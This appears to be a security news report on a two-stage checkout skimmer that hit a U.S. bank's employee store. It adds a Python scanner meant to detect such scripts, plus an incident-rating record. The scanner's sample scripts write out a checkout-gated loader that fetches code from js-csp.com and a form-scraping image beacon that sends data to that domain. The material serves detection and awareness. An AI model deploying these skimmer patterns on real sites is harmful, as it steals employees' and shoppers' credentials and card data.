Major U.S. Bank: New Malware Targets 200,000+ U.S. Bank Employees to Steal Login Credentials

Sophisticated Keylogger Attack Targets Major U.S. Bank’s Employee Store, Exposing 200,000 to Credential Theft

Cybersecurity researchers have identified a highly targeted keylogger attack on the employee store of one of America’s largest banks, compromising sensitive data for over 200,000 employees. The malware intercepted all form inputs, including login credentials, payment card details, and personal information, raising concerns about potential lateral movement into the bank’s internal systems.

The attack exploited a critical gap in enterprise security: employee-facing ecommerce platforms, which often fall outside standard security audits despite handling corporate credentials. Since bank employees frequently have elevated access to financial systems, such platforms become prime targets for threat actors seeking initial footholds in banking infrastructure.

The malware used a two-stage loader to evade detection. The first stage employed character code obfuscation to verify users had reached checkout pages before fetching a secondary harvesting script from js-csp.com/getInjector/. The second stage systematically extracted form data including input fields, dropdown menus, and text areas before exfiltrating stolen credentials via image beacon requests to bypass security controls.

At the time of discovery, only 1 of 97 security vendors on VirusTotal flagged the malicious infrastructure, highlighting a significant detection gap for ecommerce-specific threats. The attack pattern mirrors previous campaigns, including one targeting the Green Bay Packers, and marks the fifth getInjector campaign detected in the past year. The js-csp.com domain was registered in late December 2025, with the compromise identified within weeks of deployment.

The bank’s response was delayed due to the absence of a security.txt file, a standard channel for responsible disclosure. Despite researchers’ attempts to notify the bank via email and LinkedIn, the lack of formal security contacts hindered remediation efforts. The incident underscores the need for organizations to monitor client-side scripts, include internal ecommerce platforms in security audits, and deploy specialized threat detection for this emerging attack surface.
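As an added example (not code from the article, the researchers, or the bank), the script below shows what "monitoring client-side scripts" can look like for the two stages described above: it decodes String.fromCharCode literals to expose the checkout gate, lists script or image URLs pointing outside an assumed allow-list host (store.example-bank.test), and flags bulk form scraping combined with an image-beacon assignment. The two sample scripts are constructed, inert stand-ins for the stages, not the real injector.

```python
import re
from urllib.parse import urlparse

# Hosts the storefront legitimately loads code from: an assumed allow-list for this
# example, which a real deployment would take from the site's build manifest or CSP.
TRUSTED_HOSTS = {"store.example-bank.test"}

FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
URL_RE = re.compile(r"""["'](https?://[^"'\s]+)["']""")
NEW_IMAGE_RE = re.compile(r"new\s+Image\s*\(")
SRC_ASSIGN_RE = re.compile(r"\.src\s*=")
HARVEST_RE = re.compile(r"""querySelectorAll\(\s*["'][^"']*(?:input|select|textarea)""")

def decode_charcodes(js: str) -> list[str]:
    """Rebuild the strings hidden behind String.fromCharCode(...) literals."""
    decoded = []
    for m in FROMCHARCODE_RE.finditer(js):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded

def untrusted_urls(js: str) -> list[str]:
    # Absolute URLs in the script whose host is outside the allow-list.
    return sorted({u for u in URL_RE.findall(js) if urlparse(u).hostname not in TRUSTED_HOSTS})

def scan_script(js: str) -> dict:
    """Collect the indicators and count them for triage (a count, not a verdict)."""
    decoded = decode_charcodes(js)
    findings = {
        "decoded_strings": decoded,
        # stage 1: the loader only acts once the shopper has reached checkout
        "checkout_gate": any("checkout" in s.lower() for s in decoded),
        "untrusted_urls": untrusted_urls(js),
        # stage 2: bulk form scraping, then an image request carrying the data out
        "form_harvesting": bool(HARVEST_RE.search(js)),
        "image_beacon": bool(NEW_IMAGE_RE.search(js) and SRC_ASSIGN_RE.search(js)),
    }
    keys = ("checkout_gate", "untrusted_urls", "form_harvesting", "image_beacon")
    findings["indicator_count"] = sum(bool(findings[k]) for k in keys)
    return findings

# Constructed, inert samples shaped like the two stages the article describes
# (not the actual script from the incident).
STAGE1 = r"""var p = String.fromCharCode(99,104,101,99,107,111,117,116);
if (location.pathname.indexOf(p) > -1) {
  var s = document.createElement('script');
  s.src = 'https://js-csp.com/getInjector/'; document.head.appendChild(s);
}"""
STAGE2 = r"""var f = document.querySelectorAll('input, select, textarea');
var i = new Image(); i.src = 'https://js-csp.com/c?d=' + d;"""
```

Run `scan_script` over every script tag and inline block fetched from the storefront on a schedule, and alert when a script that previously scored zero starts reporting a checkout gate or an untrusted host.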

Source: https://cyberpress.org/malware-targets-us-bank-employees-login-credentials/

Bank of America cybersecurity rating report: https://www.rankiteo.com/company/bank-of-america

"id": "BAN1769475353",
"linkid": "bank-of-america",
"type": "Cyber Attack",
"date": "12/2025",
"severity": "85",
"impact": "3",
"explanation": "Attack with significant impact with internal employee data leaks"
{'affected_entities': [{'customers_affected': '200,000 employees',
                        'industry': 'Financial Services',
                        'location': 'United States',
                        'name': 'Major U.S. Bank (unnamed)',
                        'type': 'Bank'}],
 'attack_vector': 'Malicious script injection (client-side)',
 'data_breach': {'data_exfiltration': 'Yes (via image beacon requests)',
                 'number_of_records_exposed': '200,000',
                 'personally_identifiable_information': 'Yes',
                 'sensitivity_of_data': 'High',
                 'type_of_data_compromised': ['Login credentials',
                                              'Payment card details',
                                              'Personal information']},
 'description': 'Cybersecurity researchers have identified a highly targeted '
                'keylogger attack on the employee store of one of America’s '
                'largest banks, compromising sensitive data for over 200,000 '
                'employees. The malware intercepted all form inputs including '
                'login credentials, payment card details, and personal '
                'information, raising concerns about potential lateral '
                'movement into the bank’s internal systems. The attack '
                'exploited a critical gap in enterprise security: '
                'employee-facing ecommerce platforms, which often fall outside '
                'standard security audits despite handling corporate '
                'credentials. The malware used a two-stage loader to evade '
                'detection, systematically extracting form data before '
                'exfiltrating stolen credentials via image beacon requests to '
                'bypass security controls.',
 'impact': {'data_compromised': 'Login credentials, payment card details, '
                                'personal information',
            'identity_theft_risk': 'High',
            'operational_impact': 'Potential lateral movement into internal '
                                  'banking systems',
            'payment_information_risk': 'High',
            'systems_affected': 'Employee-facing ecommerce platform'},
 'initial_access_broker': {'entry_point': 'Employee-facing ecommerce platform',
                           'high_value_targets': 'Bank employees with elevated '
                                                 'access to financial systems'},
 'lessons_learned': 'Organizations need to monitor client-side scripts, '
                    'include internal ecommerce platforms in security audits, '
                    'and deploy specialized threat detection for this emerging '
                    'attack surface. The absence of a security.txt file '
                    'hindered responsible disclosure and remediation efforts.',
 'motivation': 'Credential theft for potential lateral movement into banking '
               'infrastructure',
 'post_incident_analysis': {'root_causes': ['Lack of security audits for '
                                            'employee-facing ecommerce '
                                            'platforms',
                                            'Absence of security.txt file for '
                                            'responsible disclosure',
                                            'Detection gap for '
                                            'ecommerce-specific threats']},
 'recommendations': ['Monitor client-side scripts for malicious activity',
                     'Include employee-facing ecommerce platforms in security '
                     'audits',
                     'Deploy specialized threat detection for '
                     'ecommerce-specific threats',
                     'Implement a security.txt file for responsible '
                     'disclosure'],
 'references': [{'source': 'Cybersecurity researchers'}],
 'response': {'communication_strategy': 'Delayed due to absence of '
                                        'security.txt file'},
 'title': 'Sophisticated Keylogger Attack Targets Major U.S. Bank’s Employee '
          'Store, Exposing 200,000 to Credential Theft',
 'type': 'Keylogger Attack',
 'vulnerability_exploited': 'Lack of security audits for employee-facing '
                            'ecommerce platforms'}